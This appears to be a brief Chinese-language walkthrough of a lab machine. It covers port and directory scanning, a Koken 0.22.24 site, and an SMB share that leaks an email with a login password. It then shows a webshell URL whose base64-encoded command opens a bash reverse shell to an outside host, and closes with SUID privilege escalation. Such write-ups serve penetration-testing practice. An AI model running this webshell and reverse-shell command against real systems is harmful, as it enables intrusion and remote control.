扫端口
端口漏洞
80 端口 信息收集:
两个账号信息
v1n1v131r4
templated
dirsearch 进行目录扫描
/assets
/*main.js*/
/*
Hielo by TEMPLATED
templated.co @templatedco
Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/
添加域名解析
172.16.33.88 templated.co
8000 端口 信息收集:
koken 搭建的站点,版本号0.22.24
/admin 登录口,需要邮箱和密码登录
smb服务信息收集
获取共享文件
获取共享文件夹
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
密码:babygirl
成功登录8000端口服务
获取权限
koken搭建的站点
查看是否存在漏洞
该txt阐述了如何利用koken上传木马
访问
172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i
# base64 加密
# 加密内容为经典反弹shell
拿shell
提权
上述有suid权限的可执行文件
成功提权